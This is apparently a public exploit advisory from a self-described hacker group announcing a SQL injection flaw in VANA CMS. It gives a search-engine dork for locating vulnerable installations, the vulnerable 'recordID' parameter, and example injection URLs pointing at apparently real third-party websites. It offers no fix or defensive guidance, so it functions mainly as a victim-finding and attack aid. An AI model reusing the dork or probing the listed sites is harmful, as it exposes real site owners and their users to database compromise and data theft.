VANA CMS suffers from a remote SQL injection vulnerability.
06f4bc981b8d0c7290c0f3d2af444d55400dc6e92ccfa1464b27166a7ed92ba7
#######################################################################################
# Exploit Title : VANA CMS SQL Injection
# Author : Black Hat Group
# Dork : inurl:"general/index.php?recordID="
# Discovered By : D3v!lzc0der
# Home : http://greyh4t.com - http://black-hg.org
# Software Link : http://www.vanasoft.com/
# Security Risk : High
# Version : All Version
#######################################################################################
# p0c : /general/index.php?recordID=[SQL]
#
# Example :
# http://ercls.com/general/index.php?recordID=125'
# http://denasanat.net/general/index.php?recordID=125'
# http://ercls.com/general/index.php?recordID=12'
#######################################################################################
# Special Thanks To : Net.Edit0r - 3H34N - A.Cr0x - G3n3rall - Mr.XHat - Nol1m1t
#######################################################################################